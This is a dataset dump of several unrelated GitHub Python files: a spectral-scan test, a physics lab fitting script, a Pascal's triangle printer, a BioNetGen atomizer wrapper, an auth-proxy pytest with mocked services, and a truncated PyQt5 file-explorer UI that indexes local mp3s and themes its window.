np.max(ret, axis=1)\n\n if debug:\n print(\"Average power spectrum of last %d samples (%d sec):\" % (qsize, ival))\n np.set_printoptions(formatter={'float': '{: 0.1f}'.format}, linewidth=120)\n print(avg)\n\n print(\"Envelope power spectrum of last %d samples (%d sec):\" % (qsize, ival))\n np.set_printoptions(formatter={'float': '{: 0.1f}'.format}, linewidth=120)\n print(env)\n\n # update plotter\n plt.updateplot(avg, env)\n\n # sleep for ival seconds\n ival_cnt += 1\n time.sleep(ival)\n\n# stop scan\npsd_helper.scan_dev_stop(iface)\n","repo_name":"kotobuki09/Fab_OpenVLC","sub_path":"Tx_Full_Repo/work/dev/lib/python3.7/site-packages/wishful_module_spectral_scan_ath9k/test_psd_scanner.py","file_name":"test_psd_scanner.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"15842891180","text":"import os, sys\nsys.path.append(os.path.abspath('../../Hall-effekt/src/'))\nfrom PRELABOppgave1 import EvaluatePoints\nfrom numpy import exp, log, array\nfrom matplotlib.pylab import plot, show, xlabel, ylabel, title, savefig\n\nU_list = array([8.9110, 7.0, 5.5, 4.35, 3.44, 2.70, 2.1, 1.65, 1.32, 1.05,\\\n 0.81, 0.65, 0.515, 0.410, 0.324, 0.256, 0.204, 0.161, 0.128])\nt_list = array([0, 20, 40, 60, 80, 100, 120, 140, 160, 180, 200, 220,\\\n 240, 260, 280, 300, 320, 340, 360])\n\nwith open('datapointsIRV.txt', 'w') as f:\n for i in range(U_list.size):\n f.write(\"%g \\t %g\\n\" % (t_list[i], log(U_list[i])))\n\ntau = -1.0/((log(U_list[-1]) - log(U_list[0]))/float(t_list[-1] - t_list[0]))\n\nwith open(\"InnerRV.txt\", 'w') as f:\n f.write(\"Tau is equal to: %g s\\\\\\\\ \\n\" % tau)\n f.write(\"Inner resistance: %g ohm\" % (tau/float(8.3e-6)))\n\nEP = EvaluatePoints('datapointsIRV.txt')\nEP.storeValues()\nEP.interpolate(2, 0)\nEP.plotPoints(\"Inner resistance of Voltmeter.\", \"InnerRV.png\", \"t [s]\", \"V [V]\")\n","repo_name":"moncar/FYS1120","sub_path":"Lab/GrunnleggjandeEMM/src/Oppgave1.1.py","file_name":"Oppgave1.1.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8034119696","text":"from math import *\n\nn = 15\nfor j in range(n):\n l = []\n for i in range(n):\n if j < i:\n break\n l.append(int(factorial(j) / (factorial(i) * factorial(j - i))))\n print(*l)","repo_name":"kliashenko001/Algorithms","sub_path":"pascal.py","file_name":"pascal.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18246164154","text":"import bionetgen.atomizer.libsbml2bngl as ls2b\nfrom bionetgen.core.defaults import BNGDefaults\nimport yaml, os\n\nd = BNGDefaults()\n\n\nclass AtomizeTool:\n def __init__(self, input_file=None, options_dict=None, parser_namespace=None):\n # we generate our defaults first and override it with\n # the dictionary first and then the namespace\n config = {\n \"input\": None, # we need this, check at the end and fail if we don't have it\n \"annotation\": False,\n \"output\": None,\n \"convention_file\": None,\n \"naming_conventions\": None,\n \"user_structures\": None,\n \"molecule_id\": False,\n \"convert_units\": False, # currently not supported\n \"atomize\": False, # default is flat translation\n \"pathwaycommons\": True, # requires connection so default is false\n \"bionetgen_analysis\": os.path.join(\n d.bng_path, \"BNG2.pl\"\n ), # TODO: get it from app config\n \"isomorphism_check\": False, # wtf do we do here?\n \"ignore\": False, # wtf do we do here?\n \"memoized_resolver\": False,\n \"keep_local_parameters\": False,\n \"quiet_mode\": False,\n \"obs_map_file\": None,\n \"log_level\": \"DEBUG\", # options are \"CRITICAL\", \"ERROR\", \"WARNING\", \"INFO\", \"DEBUG\"\n }\n # input file\n if input_file is not None:\n config[\"input\"] = input_file\n # dictionary override\n if options_dict is not None:\n for key in config:\n if key in options_dict:\n config[key] = options_dict[key]\n # namespace override\n if parser_namespace is not None:\n for key in config:\n if hasattr(parser_namespace, key):\n config[key] = getattr(parser_namespace, key)\n self.config = self.checkConfig(config)\n\n def checkConfig(self, config):\n options = {}\n options[\"inputFile\"] = config[\"input\"] # TODO: ensure this is not None\n conv, useID, naming = ls2b.selectReactionDefinitions(options[\"inputFile\"])\n options[\"outputFile\"] = (\n config[\"output\"]\n if config[\"output\"] is not None\n else options[\"inputFile\"] + \".bngl\"\n )\n options[\"conventionFile\"] = (\n config[\"convention_file\"] if config[\"convention_file\"] is not None else conv\n )\n options[\"userStructure\"] = config[\"user_structures\"]\n options[\"namingConventions\"] = (\n config[\"naming_conventions\"]\n if config[\"naming_conventions\"] is not None\n else naming\n )\n options[\"useId\"] = config[\"molecule_id\"]\n options[\"annotation\"] = config[\"annotation\"]\n options[\"atomize\"] = config[\"atomize\"]\n options[\"pathwaycommons\"] = config[\"pathwaycommons\"]\n options[\"bionetgenAnalysis\"] = config[\"bionetgen_analysis\"]\n options[\"isomorphismCheck\"] = config[\"isomorphism_check\"]\n options[\"ignore\"] = config[\"ignore\"]\n options[\"noConversion\"] = not config[\"convert_units\"]\n options[\"memoizedResolver\"] = config[\"memoized_resolver\"]\n options[\"replaceLocParams\"] = not config[\"keep_local_parameters\"]\n options[\"quietMode\"] = config[\"quiet_mode\"]\n options[\"obs_map_file\"] = config[\"obs_map_file\"]\n assert config[\"log_level\"] in [\n \"CRITICAL\",\n \"ERROR\",\n \"WARNING\",\n \"INFO\",\n \"DEBUG\",\n ], \"Logging level {} is not an allowed level\".format(config[\"log_level\"])\n options[\"logLevel\"] = config[\"log_level\"]\n return options\n\n def run(self):\n self.returnArray = ls2b.analyzeFile(\n self.config[\"inputFile\"],\n self.config[\"conventionFile\"],\n self.config[\"useId\"],\n self.config[\"namingConventions\"],\n self.config[\"outputFile\"],\n speciesEquivalence=self.config[\"userStructure\"],\n atomize=self.config[\"atomize\"],\n bioGrid=False,\n pathwaycommons=self.config[\"pathwaycommons\"],\n ignore=self.config[\"ignore\"],\n noConversion=self.config[\"noConversion\"],\n memoizedResolver=self.config[\"memoizedResolver\"],\n replaceLocParams=self.config[\"replaceLocParams\"],\n quietMode=self.config[\"quietMode\"],\n logLevel=self.config[\"logLevel\"],\n obs_map_file=self.config[\"obs_map_file\"],\n )\n try:\n if self.config[\"bionetgenAnalysis\"] and self.returnArray:\n ls2b.postAnalyzeFile(\n self.config[\"outputFile\"],\n self.config[\"bionetgenAnalysis\"],\n self.returnArray.database,\n replaceLocParams=self.config[\"replaceLocParams\"],\n obs_map_file=self.config[\"obs_map_file\"],\n )\n except Exception as e:\n print(\"Post analysis failed\")\n print(e)\n\n try:\n if self.config[\"annotation\"] and self.returnArray:\n with open(self.config[\"outputFile\"] + \".yml\", \"w\") as f:\n f.write(\n yaml.dump(self.returnArray.annotation, default_flow_style=False)\n )\n except Exception as e:\n print(\"annotation file writing failed\")\n print(e)\n return self.returnArray\n","repo_name":"ASinanSaglam/PyBioNetGen","sub_path":"bionetgen/atomizer/atomizeTool.py","file_name":"atomizeTool.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"33615497912","text":"import pytest\n\n\nAM_ROUTE_RULES = [\n {\n 'input': {\n 'description': '(imported from taxi config)',\n 'maintained_by': 'eats_common_components',\n 'prefix': '/test',\n 'priority': 100,\n 'rule_name': '/test',\n },\n 'output': {\n 'attempts': 1,\n 'rewrite_path_prefix': '/test',\n 'timeout_ms': 100,\n 'tvm_service': 'mock',\n 'upstream': {'$mockserver': ''},\n },\n 'proxy': {\n 'auth_type': 'session',\n 'cookie_webview_enabled': False,\n 'passport_scopes': [],\n 'proxy_cookie': [],\n 'personal': {\n 'eater_id': True,\n 'eater_uuid': True,\n 'email_id': True,\n 'phone_id': True,\n },\n 'proxy_401': False,\n },\n 'rule_type': 'eats-authproxy',\n },\n]\n\n\n@pytest.mark.parametrize(\n 'ea_login_answer', ['TimeoutError', 'NetworkError', 'Response403', 'OK'],\n)\n@pytest.mark.parametrize('try_to_use_eater_from_eaters', [True, False])\n@pytest.mark.passport_token(token={'uid': '100', 'scope': 'eats:all'})\n@pytest.mark.eater_session(outer={'inner': 'in'})\n@pytest.mark.eater(\n u100={\n 'id': '100',\n 'personal_phone_id': 'p100',\n 'personal_email_id': 'e100',\n },\n)\n@pytest.mark.routing_rules(AM_ROUTE_RULES)\nasync def test_login_in_ea(\n taxi_eats_authproxy,\n mockserver,\n mock_eater_authorizer,\n mock_core_eater,\n blackbox_service,\n request_proxy,\n ea_login_answer,\n taxi_config,\n try_to_use_eater_from_eaters,\n):\n config = taxi_config.get('EATS_AUTHPROXY_FEATURE_FLAGS')\n config['try_to_use_eater_from_eaters'] = try_to_use_eater_from_eaters\n taxi_config.set_values({'EATS_AUTHPROXY_FEATURE_FLAGS': config})\n await taxi_eats_authproxy.invalidate_caches()\n\n @mockserver.json_handler('test/123')\n def _mock_backend(request):\n if try_to_use_eater_from_eaters:\n assert (\n set(\n x.strip()\n for x in request.headers['X-Eats-User'].split(',')\n )\n == set(\n [\n 'user_id=100',\n 'personal_phone_id=p100',\n 'personal_email_id=e100',\n 'eater_uuid=100',\n ],\n )\n )\n else:\n assert 'X-Eats-User' not in request.headers\n\n @mockserver.json_handler('/eater-authorizer/v1/eater/sessions/login')\n def _mock_login(request):\n assert request.json['eater_id'] == '100'\n assert request.json['inner_session_id'] == 'in'\n\n if ea_login_answer == 'TimeoutError':\n raise mockserver.TimeoutError()\n elif ea_login_answer == 'NetworkError':\n raise mockserver.NetworkError()\n elif ea_login_answer == 'Response403':\n return mockserver.make_response('bad request', status=403)\n elif ea_login_answer == 'OK':\n pass\n\n return 'ok'\n\n response = await request_proxy('token', headers={'Origin': 'yandex.ru'})\n assert response.status_code == 200\n assert _mock_backend.times_called == 1\n assert _mock_login.times_called > 0 # retries\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_eats_authproxy/test_login_in_ea.py","file_name":"test_login_in_ea.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19271928334","text":"from random import randint\r\nfrom threading import Thread, Timer\r\nimport pygetwindow\r\nfrom PIL import Image # pip install pillow\r\nfrom PIL.ImageFilter import *\r\nfrom PyQt5.QtCore import * # pip install PyQt5\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtWebEngineWidgets import * # search for it\r\nfrom PyQt5.QtWidgets import *\r\nfrom pyautogui import *\r\nfrom win32api import *\r\nfrom win10toast import ToastNotifier\r\nimport keyboard\r\nfrom PyQt5 import QtWidgets, QtCore, QtGui, uic\r\nfrom pygame import mixer, error, USEREVENT, event\r\nfrom mutagen.mp3 import MP3, HeaderNotFoundError, MutagenError\r\n\r\n# constants\r\nWIDTH_ = GetSystemMetrics(0)\r\nHEIGHT_ = GetSystemMetrics(1)\r\nUSER = GetUserName()\r\nPATH_ = \"\"\r\n# may be i not pretty\r\nif not os.path.isdir(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache'):\r\n os.makedirs(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache')\r\n\r\n\r\nclass BlurEffect(QtWidgets.QGraphicsBlurEffect):\r\n effectRect = None\r\n\r\n def setEffectRect(self, rect):\r\n self.effectRect = rect\r\n self.update()\r\n\r\n def draw(self, qp):\r\n if self.effectRect is None or self.effectRect.isNull():\r\n # no valid effect rect to be used, use the default implementation\r\n super().draw(qp)\r\n\r\n else:\r\n qp.save()\r\n # clip the drawing so that it's restricted to the effectRect\r\n qp.setClipRect(self.effectRect)\r\n # call the default implementation, which will draw the effect\r\n super().draw(qp)\r\n # get the full region that should be painted\r\n fullRegion = QtGui.QRegion(qp.viewport())\r\n # and subtract the effect rectangle\r\n fullRegion -= QtGui.QRegion(self.effectRect)\r\n qp.setClipRegion(fullRegion)\r\n # draw the *source*, which has no effect applied\r\n self.drawSource(qp)\r\n qp.restore()\r\n\r\n\r\nclass Main(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n self.value = False\r\n self.setMinimumSize(int(WIDTH_ / 1.2), int(HEIGHT_ / 1.2))\r\n self.setWindowFlag(Qt.FramelessWindowHint)\r\n self.setAttribute(Qt.WA_TranslucentBackground)\r\n self.setAutoFillBackground(True)\r\n self.username = GetUserName()\r\n\r\n\r\n # # UI Setup\r\n self.ui = uic.loadUi(\"D:/file_explorer_ui/UPDATE4.ui\", self)\r\n self.show()\r\n\r\n # radio button manager\r\n with open(\"lib.dll\", \"r\") as reader:\r\n read = str(reader.read())\r\n\r\n # combobox manager\r\n with open('rep32.dll', 'r') as theme_reader:\r\n read_theme = theme_reader.read()\r\n\r\n if read == \"True\":\r\n self.effect_radiobutton.setChecked(True)\r\n self.set_acrylic(True, \"set_all\")\r\n else:\r\n self.effect_radiobutton.setChecked(False)\r\n self.set_acrylic(False, \"dark\")\r\n print('dark')\r\n\r\n if read_theme == 'acrylic':\r\n self.theme_box.setCurrentIndex(1)\r\n elif read_theme == 'transparent':\r\n self.theme_box.setCurrentIndex(2)\r\n elif read_theme == 'blur':\r\n self.theme_box.setCurrentIndex(3)\r\n elif read_theme == 'light':\r\n self.theme_box.setCurrentIndex(4)\r\n elif read_theme == 'dark':\r\n self.theme_box.setCurrentIndex(5)\r\n elif read_theme == 'amoled':\r\n self.theme_box.setCurrentIndex(6)\r\n elif read_theme == 'default':\r\n self.theme_box.setCurrentIndex(0)\r\n # self.setupUi(self)\r\n self.functionalities()\r\n self.setGeometry(int(WIDTH_ / 12), int(HEIGHT_ / 16), int(WIDTH_ / 1.14), int(HEIGHT_ / 1.19))\r\n self.showMaximized()\r\n\r\n get_image = screenshot()\r\n r = str(randint(10, 100000))\r\n with open(\"assets/resources/holder.tru\", 'w') as hold:\r\n hold.write(r)\r\n\r\n try:\r\n get_image.save(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_ref{r}.jpeg')\r\n frame_one_image = Image.open(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_ref{r}.jpeg')\r\n skinned_ = Image.eval(frame_one_image, lambda x: x / 2)\r\n frame_one_blurred_image = skinned_.filter(GaussianBlur(radius=3))\r\n frame_one_blurred_image.save(f\"C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_reb1{r}.jpeg\")\r\n except FileNotFoundError:\r\n pass\r\n\r\n if self.isMaximized():\r\n self.setWindowOpacity(1.0)\r\n\r\n # FRAMES UI\r\n\r\n # FRAME 1\r\n try:\r\n self.graphics.setStyleSheet(f\"\"\"\r\n background: url(C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_reb1{r}.jpeg);\r\n background-repeat: repeat;\r\n background-position: left;\r\n border: 0;\"\"\")\r\n\r\n\r\n except FileNotFoundError:\r\n pass\r\n\r\n # self.mainlayout = QtWidgets.QVBoxLayout(self)\r\n # self.mainlayout.setContentsMargins(0, 0, 0, 0)\r\n #\r\n # self.subWidget = QtWidgets.QWidget()\r\n # self.mainlayout.addWidget(self.subWidget)\r\n #\r\n # self.effect = BlurEffect()\r\n #\r\n # self.subWidget.setGraphicsEffect(self.effect)\r\n # self.effect.setEnabled(True)\r\n # self.effect.setBlurRadius(40)\r\n #\r\n # self.menu = QtWidgets.QWidget(self)\r\n # self.menu.setVisible(False)\r\n # self.menu.setFixedWidth(300)\r\n # self.menu.move(-self.menu.width(), 0)\r\n #\r\n # self.menuLayout = QtWidgets.QVBoxLayout(self.menu)\r\n #\r\n # self.menuAnimation = QtCore.QVariantAnimation()\r\n # self.menuAnimation.setDuration(400)\r\n # self.menuAnimation.setEasingCurve(QtCore.QEasingCurve.OutQuart)\r\n # self.menuAnimation.setStartValue(-self.menu.width())\r\n # self.menuAnimation.setEndValue(0)\r\n #\r\n #\r\n # def openMenu(self):\r\n # # if self.menu.x() >= 0:\r\n # # # the menu is already visible\r\n # # return\r\n # # ensure that the menu starts hidden (that is, with its right border\r\n # # aligned to the left of the main widget)\r\n # self.menu.move(-self.menu.width(), 0)\r\n # self.menu.setVisible(True)\r\n # self.menu.setFocus()\r\n #\r\n # # enable the effect, set the forward direction for the animation, and\r\n # # start it; it's important to set the effect rectangle here too, otherwise\r\n # # some flickering might show at the beginning\r\n # self.effect.setEffectRect(self.menu.geometry())\r\n # self.effect.setEnabled(True)\r\n # self.menuAnimation.setDirection(QtCore.QVariantAnimation.Forward)\r\n # self.menuAnimation.start()\r\n # print(\"Trying ..\")\r\n def set_acrylic(self, val=True or False, *args):\r\n if val:\r\n for i in args:\r\n if i == \"set_all\":\r\n self.all_frame.setStyleSheet(f\"\"\"background: transparent;\"\"\")\r\n self.window_frame.setStyleSheet(f\"\"\"background: transparent;\"\"\")\r\n self.graphics.setStyleSheet(f\"\"\"background: transparent;\"\"\")\r\n\r\n with open(\"assets/resources/holder.tru\", \"r\") as reader:\r\n r = str(reader.read())\r\n self.all_frame.setStyleSheet(f\"\"\"\r\n background: transparent;\r\n background: url('C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_reb1{r}.jpeg');\r\n background-repeat: no-repeat;\r\n background-position: left;\r\n border: 0;\"\"\")\r\n\r\n if i == \"set_on_left\" or i == 'default':\r\n\r\n with open(\"assets/resources/holder.tru\", \"r\") as reader:\r\n r = str(reader.read())\r\n self.all_frame.setStyleSheet(f\"\"\"\r\n background: url('C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_reb1{r}.jpeg');\r\n background-repeat: no-repeat;\r\n background-position: left;\r\n border: 0;\"\"\")\r\n self.window_frame.setStyleSheet(\"background: black;\")\r\n\r\n if i == \"set_on_right\":\r\n with open(\"assets/resources/holder.tru\", \"r\") as reader:\r\n r = str(reader.read())\r\n self.window_frame.setStyleSheet(f\"\"\"\r\n background: transparent;\r\n background: url('C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_reb1{r}.jpeg');\r\n background-repeat: no-repeat;\r\n background-position: left;\r\n border: 0;\"\"\")\r\n\r\n return\r\n else:\r\n for i in args:\r\n if i == \"amoled\":\r\n self.all_frame.setStyleSheet(\"\"\"background: black;\"\"\")\r\n self.window_frame.setStyleSheet(\"\"\"background: black;\"\"\")\r\n self.graphics.setStyleSheet(\"\"\"background: black;\"\"\")\r\n if i == \"dark\":\r\n self.all_frame.setStyleSheet(f\"\"\"background: rgb(40, 40, 40);\"\"\")\r\n self.window_frame.setStyleSheet(f\"\"\"background: rgb(40, 40, 40);\"\"\")\r\n self.graphics.setStyleSheet(f\"\"\"background: rgb(30, 30, 30);\"\"\")\r\n if i == \"light\":\r\n self.all_frame.setStyleSheet(f\"\"\"\r\n background: rgb(255, 255, 255);\r\n color: rgb(0, 0, 0)\"\"\")\r\n if i == \"transparent\":\r\n self.all_frame.setStyleSheet(f\"\"\"background: \ttransparent;\"\"\")\r\n self.window_frame.setStyleSheet(f\"\"\"background: transparent;\"\"\")\r\n self.graphics.setStyleSheet(f\"\"\"background: transparent;\"\"\")\r\n if i == 'semi-transparent':\r\n self.all_frame.setStyleSheet(f\"\"\"background: rgba(0, 0, 0, 128);\"\"\")\r\n self.window_frame.setStyleSheet(f\"\"\"background: rgba(0, 0, 0, 128);\"\"\")\r\n self.graphics.setStyleSheet(f\"\"\"background: rgba(0, 0, 0, 128);\"\"\")\r\n self.setWindowOpacity(0.8)\r\n\r\n def setup_elegantUi(self):\r\n if self.isMaximized():\r\n if self.effect_radiobutton.isChecked():\r\n self.set_acrylic(True, \"set_all\")\r\n with open(\"lib.dll\", \"w\") as writer:\r\n writer.write(\"True\")\r\n else:\r\n self.set_acrylic(False, 'dark')\r\n with open(\"lib.dll\", \"w\") as writer:\r\n writer.write(\"False\")\r\n\r\n def slideMenu(self, value= True or False):\r\n width = self.graphics.width()\r\n\r\n\r\n if value:\r\n # decrease the slide menu size\r\n\r\n # set name\r\n self.collapse.setText(\"\")\r\n self.search_box.setVisible(False)\r\n # self.search.setMaximumWidth(20)\r\n self.search.setStyleSheet(\"\"\"\r\n QPushButton{\r\ncolor: white;\r\nbackground: transparent;\r\npadding-right: 5px;\r\n\t\r\n}\r\n\r\nQPushButton::hover{\r\n\tcolor: white;\r\n\tbackground-color : rgba(255, 255 ,255 ,50);\r\n\r\n}\r\n\r\nQPushButton::pressed{\r\n\tbackground-color: rgba(255, 255, 255, 80)\r\n}\r\n \"\"\")\r\n\r\n #\r\n # if width == 380:\r\n # new_width = 45\r\n # else:\r\n # new_width = 380\r\n #\r\n #\r\n # self.animation = QtCore.QPropertyAnimation(self.graphics, b\"maximumWidth\", self)\r\n # self.animation.setStartValue(width)\r\n # self.animation.setEndValue(new_width)\r\n # self.animation.setEasingCurve(QtCore.QEasingCurve.InOutQuart)\r\n # self.animation.setDuration(200)\r\n # self.animation.start()\r\n\r\n self.graphics.setMaximumWidth(10)\r\n self.graphics.setMinimumWidth(45)\r\n\r\n self.gdrive_line.setVisible(False)\r\n self.settings_line.setVisible(False)\r\n\r\n\r\n\r\n return -1\r\n\r\n else:\r\n # increae the size\r\n # set name\r\n self.collapse.setText(\" Fluent Explorer\")\r\n self.search.setStyleSheet(\"\"\"\r\n QPushButton{\r\n color: white;\r\n background: transparent;\r\n padding-right: 5px;\r\n }\r\n \"\"\")\r\n\r\n # if width == 45:\r\n # new_width = 380\r\n # else:\r\n # new_width = 45\r\n #\r\n #\r\n # self.animation_down = QtCore.QPropertyAnimation(self.graphics, b\"minimumWidth\", self)\r\n # self.animation_down.setStartValue(45)\r\n # self.animation_down.setEndValue(350)\r\n # self.animation_down.setEasingCurve(QtCore.QEasingCurve.InElastic)\r\n # self.animation_down.setDuration(200)\r\n # self.animation_down.start()\r\n #\r\n # print(\"Down Width : \", width)\r\n\r\n # self.search.setMaximumWidth(200)\r\n self.graphics.setMaximumWidth(380)\r\n self.graphics.setMinimumWidth(350)\r\n\r\n self.search_box.setVisible(True)\r\n self.gdrive_line.setVisible(True)\r\n self.settings_line.setVisible(True)\r\n # self.search_clear.setVisible(True)\r\n\r\n def menu_handler(self):\r\n\r\n with open(\"assets/resources/Core.dll\", \"r\") as reader:\r\n read = reader.read()\r\n\r\n if read == \"True\":\r\n self.slideMenu(False)\r\n with open(\"assets/resources/Core.dll\", \"w\") as writer:\r\n writer.write(\"False\")\r\n\r\n self.search.clicked.connect(lambda: self.slideMenu(False))\r\n\r\n else:\r\n self.slideMenu(True)\r\n with open(\"assets/resources/Core.dll\", \"w\") as writer:\r\n writer.write(\"True\")\r\n\r\n def fluentHandler(self):\r\n # FRAME 1\r\n with open(\"assets/resources/holder.tru\", \"r\") as reader_:\r\n r = str(reader_.read())\r\n\r\n self.graphics.setStyleSheet(f\"\"\"\r\n background: url(C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_reb1{r}.jpeg);\r\n background-repeat: repeat;\r\n background-position: left;\r\n border: 0;\"\"\")\r\n\r\n def min(self):\r\n self.showMinimized()\r\n\r\n def max_reduce(self):\r\n if self.isMaximized():\r\n self.showNormal()\r\n icon = QIcon()\r\n icon.addFile(\"assets/resources/images/maximize.png\", QSize(), QIcon.Normal, QIcon.Off)\r\n self.maximize.setIcon(icon)\r\n\r\n self.set_acrylic(True)\r\n else:\r\n self.showMaximized()\r\n icon = QIcon()\r\n icon.addFile(\"assets/resources/images/estore.png\", QSize(), QIcon.Normal, QIcon.Off)\r\n self.maximize.setIcon(icon)\r\n self.set_acrylic(True)\r\n\r\n def stop(self):\r\n app.closeAllWindows()\r\n sys.exit()\r\n\r\n# ################################################### Main UI ######################################################\r\n # ************************* This Pc *************************** #\r\n def thisPC_UI(self):\r\n drives = GetLogicalDriveStrings()\r\n lst = []\r\n for i in drives:\r\n if str(i).isalpha():\r\n lst.append(\" \" + i)\r\n\r\n for i in range(len(lst)):\r\n pushbuton = QPushButton(f\"{lst[i]}\")\r\n pushbuton.setMinimumSize(150, 45)\r\n # pushbuton.setMaximumWidth(200)\r\n\r\n pushbuton.setFont(QFont(\"Segoe UI\", 16))\r\n\r\n if lst[i] == \" C\":\r\n pushbuton.setIcon(QIcon(\"assets/resources/images/drive.png\"))\r\n pushbuton.setIconSize(QSize(25, 25))\r\n pushbuton.setStyleSheet(\"\"\"\r\n QPushButton{\r\n color: white;\r\n background: transparent;\r\n text-align: left;\r\n align: left;\r\n padding-left: 25px;\r\n }\r\n \r\n QPushButton::hover{\r\n color: white;\r\n background-color : rgba(255, 255 ,255 ,50);\r\n \r\n }\r\n \r\n QPushButton::pressed{\r\n background-color: rgba(255, 255, 255, 80)\r\n }\r\n\"\"\")\r\n self.drives_layout.addWidget(pushbuton)\r\n # self.drives_layout.addWidget()\r\n\r\n # ************************* MUSIC ***************************** #\r\n\r\n def music_indexer(self, *args):\r\n from random import choice\r\n # provide te choice\r\n t = ('Please wait while we take care of few things.', 'Indexing will help to search entire drive faster.',\r\n 'Some changes have been found since last run. Please wait while we index.')\r\n\r\n def toast_r():\r\n # show toast\r\n try:\r\n ToastNotifier().show_toast(title='Indexing Musics in Local Drives.',\r\n msg=choice(t),\r\n duration=7,\r\n icon_path='Graphics/Elements/icon.ico')\r\n except (AttributeError, RuntimeError, AssertionError):\r\n pass\r\n\r\n Thread(target=toast_r).start()\r\n\r\n # def assist():\r\n # try:\r\n # loader = MP3(\"Assist/indexing.mp3\")\r\n # mixer.init(frequency=loader.info.sample_rate)\r\n # mixer.music.load(\"Assist/indexing.mp3\")\r\n # mixer.music.play()\r\n # except error:\r\n # pass\r\n # except Exception:\r\n # pass\r\n #\r\n # Thread(target=assist).start()\r\n\r\n # main indexer to find the mp3 file\r\n musics = open(f'C:/Users/{GetUserName()}/AppData/Local/Temp/CachedData/mr.tru', 'w')\r\n path = open(f'C:/Users/{GetUserName()}/AppData/Local/Temp/CachedData/mp.tru', 'w')\r\n\r\n # walker\r\n for v in os.walk(r'C:/Users'):\r\n for g in v[2]:\r\n try:\r\n if g.endswith('.mp3'):\r\n musics.write(f'{g}\\n')\r\n path.write(f'{v[0]}\\n')\r\n except UnicodeEncodeError:\r\n pass\r\n\r\n new_songs = 0\r\n # # new drive walker\r\n # for i in range(current_active - 1):\r\n # for e in get_active_drives[1:current_active]:\r\n # walker_drives = os.walk(f'{e}')\r\n # for z in walker_drives:\r\n # for r in z[2]:\r\n # try:\r\n # if r.endswith('.mp3'):\r\n # f.write(f'{r}\\n')\r\n # reviser.write(f'{z[0]}\\n')\r\n # new_songs += 1\r\n # except UnicodeEncodeError:\r\n # pass\r\n # save and close the file\r\n musics.close()\r\n path.close()\r\n\r\n # with open('Asse', 'w') as ne:\r\n # ne.write('False')\r\n\r\n # with open(f'C:/Users/{GetUserName()}/Fluent Player+/temp/Assets/optimizer.tru', \"r\") as optimize:\r\n # reader = optimize.read()\r\n #\r\n # if reader == \"True\":\r\n # try:\r\n # ToastNotifier().show_toast(title=f\"Added {new_songs} songs into library.\",\r\n # msg=f\"We have found {new_songs} in your device and added to library. \",\r\n # duration=14,\r\n # icon_path=\"Graphics/Elements/icon.ico\")\r\n # except (RuntimeError, AttributeError, AssertionError):\r\n # pass\r\n with open(f'C:/Users/{GetUserName()}/AppData/Local/Temp/CachedData/optimizer.tru', \"w\") as optimization:\r\n optimization.write(\"False\")\r\n\r\n def music_UI(self):\r\n if not os.path.isfile(f'C:/Users/{GetUserName()}/AppData/Local/Temp/CachedData/mr.tru'):\r\n Thread(target=self.music_indexer)\r\n\r\n read_music = open(f'C:/Users/{GetUserName()}/AppData/Local/Temp/CachedData/mr.tru', 'r').readlines()\r\n\r\n total = 0\r\n\r\n for i in read_music:\r\n total += 1\r\n print('Total Songs : ', total)\r\n\r\n for i in range(total):\r\n for z in read_music:\r\n print(z)\r\n # songs_button = QPushButton(text=str(z))\r\n # songs_button.setMaximumHeight(45)\r\n # songs_button.setStyleSheet(\"\"\"\r\n # QPushButton{\r\n # color: white;\r\n # background: transparent;\r\n # text-align: left;\r\n # padding-left: 10px;\r\n # }\r\n #\r\n # QPushButton::hover{\r\n # color: white;\r\n # background-color : rgba(255, 255 ,255 ,50);\r\n #\r\n # }\r\n #\r\n # \"\"\")\r\n item = QListWidgetItem('akash')\r\n self.song_view.addItem(item)\r\n\r\n\r\n def clear_search(self):\r\n self.search_box.setText('')\r\n\r\n def functionalities(self):\r\n\r\n # Title bar buttons\r\n # self.close.clicked.connect(self.stop)\r\n self.music.clicked.connect(self.music_UI)\r\n self.minimize.clicked.connect(self.min)\r\n self.maximize.clicked.connect(self.max_reduce)\r\n self.collapse.clicked.connect(self.menu_handler)\r\n self.close.clicked.connect(self.stop)\r\n self.thisPC.clicked.connect(self.thisPC_UI)\r\n # self.search_clear.clicked.connect(self.clear_search)\r\n # self.downloads.clicked.connect(self.downloads_UI)\r\n self.effect_radiobutton.toggled.connect(self.setup_elegantUi)\r\n self.theme_box.activated.connect(self.theme_manager)\r\n\r\n def themeRegistry(self, theme='acrylic'):\r\n with open('rep32.dll', 'w') as theme_writer:\r\n theme_writer.write(theme)\r\n\r\n def setTheme(self):\r\n with open('rep32.dll', 'r') as reader:\r\n read = reader.read()\r\n\r\n if read == 'dark':\r\n self.set_acrylic(False, 'dark')\r\n elif read == 'amoled':\r\n self.set_acrylic(False, 'amoled')\r\n elif read == 'acrylic':\r\n if self.effect_radiobutton.isChecked():\r\n self.set_acrylic(True, 'set_all')\r\n else:\r\n self.set_acrylic(True, 'set_on_left')\r\n elif read == 'blur':\r\n if self.effect_radiobutton.isChecked():\r\n self.set_acrylic(True, 'set_all')\r\n else:\r\n 